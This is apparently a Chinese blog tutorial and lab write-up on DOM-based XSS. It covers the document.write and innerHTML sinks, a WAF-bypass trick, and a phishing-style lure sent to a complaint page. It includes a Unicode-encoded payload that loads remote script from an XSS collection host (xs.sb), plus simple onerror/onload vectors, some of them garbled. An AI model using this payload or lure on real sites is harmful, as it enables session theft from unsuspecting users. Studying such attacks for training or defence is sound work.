其他分享
首页 > 其他分享> > xss三部曲 - 3

xss三部曲 - 3

作者:互联网

目录

Dom

DomDocument Object Model的简称,是基于文档对象模型的一种漏洞。 Dom 是一个与平台、编译语言无关的接口(通信渠道)

程序和脚本可以通过 dom 接口来修改前端页面显示

document.cookie:获取(设置)当前页面的 Cookie

document.domain:返回当前域名

document.lastModifed:返回最后修改时间(识别伪静态)

document.referer:返回载入当前页面url

document.URL:返回当前页面url

document.title:返回title

document.write:修改当前页面

document.write('<script>alert(1)</script>')

var pos		//$pos
document.URL.indexOF("#")	//返回当前页面 # 首次出现的位置
var pos=document.URL.indexOF("name=")+5

#:锚点(书签、索引)

document.getElementById("")选中

document.innerHTML:获取或修改选中的值

<img src='# one rror=alert(1) />

三种dom

location.hash.substr(1);
//取锚点后的值

document.write

JS可以通过 Native 编码

wp

源码中写了document.write(),可以试试xss,它会将url的请求回显在页面上

写入xss弹窗(注意,访问index.php/1.txt:当他不存在时不触发安全狗;先闭合之前的<script>

向投诉中心发送请求:

反正就是说一些诱导你点击网址的话,我说什么你也会点的吧

利用xss平台生成payload,用 Native 加密(直接ASCII转Native即可)

反正就是说一些诱导你点击网址的话,我说什么你也会点的吧http://59.63.200.79:8014/dom_xss/index.php?asd=\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u0020\u0073\u0052\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u0071\u006d\u006f\u0052\u003e\u003c\u002f\u0073\u0043\u0072\u0049\u0070\u0054\u003e

也可以使用短链接转换


<img src='#' one rror=alert(1) />

<svg onl oad="alert(1)">

标签:xss,三部曲,u002f,write,u0073,document,页面
来源: https://www.cnblogs.com/1ta-chi/p/15740800.html